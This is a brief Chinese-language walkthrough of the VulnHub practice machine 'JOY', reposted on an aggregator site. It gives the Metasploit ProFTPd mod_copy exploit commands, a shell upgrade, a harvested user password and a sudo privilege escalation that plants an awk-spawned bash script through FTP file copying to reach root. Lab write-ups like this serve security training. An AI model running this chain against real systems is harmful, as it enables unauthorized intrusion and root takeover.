JOY靶机 - 走看看

zoukankan html css js c++ java

JOY靶机

仅供个人娱乐

靶机信息

下载地址：https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

一、主机扫描

二、信息收集和漏洞利用

FTP服务允许匿名用户(anonymous)登录

或者

由于version_control存在于patrick路径中，我们是没有权限去获取的，所以尝试将其转移到/upload路径中

敏感信息

ProFTPd: 1.3.5

/var/www/tryingharderisjoy

故障更改ip

use exploit/unix/ftp/proftpd_modcopy_exec

set rhosts 192.168.74.130

set sitepath /var/www/tryingharderisjoy

run

python -c 'import pty; pty.spawn("/bin/bash")'

信息收集

su -l patrick     apollo098765

提权

本地主机编写脚本

echo "awk 'BEGIN {system("/bin/bash")}'" > test

使用ftp上传到upload            anonymous

在使用telnet转换一下路径

site cpfr /home/ftp/upload/test

site cpto /home/patrick/script/test

使用脚本

sudo /home/patrick/script/test

cd /root

cat proof.txt

搞定

参考文章https://blog.csdn.net/weixin_44214107/article/details/101228240

查看全文

相关阅读:
CentOS 6.5、6.7 设置静态 ip 教程
 Nagios
zabbix
xml 的 <![CDATA["URL"]]>
Don't make a promise when you are in Joy. Don't reply when you are Sad.Don't take decisions when you are Angry.Think Twice.Act Wise.
DNS-2
APM
Time crumbles things; everything grows old under the power of Time and is forgotten through the lapse of Time
CentOS 7 配置静态 ip
AOP

原文地址：https://www.cnblogs.com/bingtang123/p/12883668.html

Copyright © 2011-2022 走看看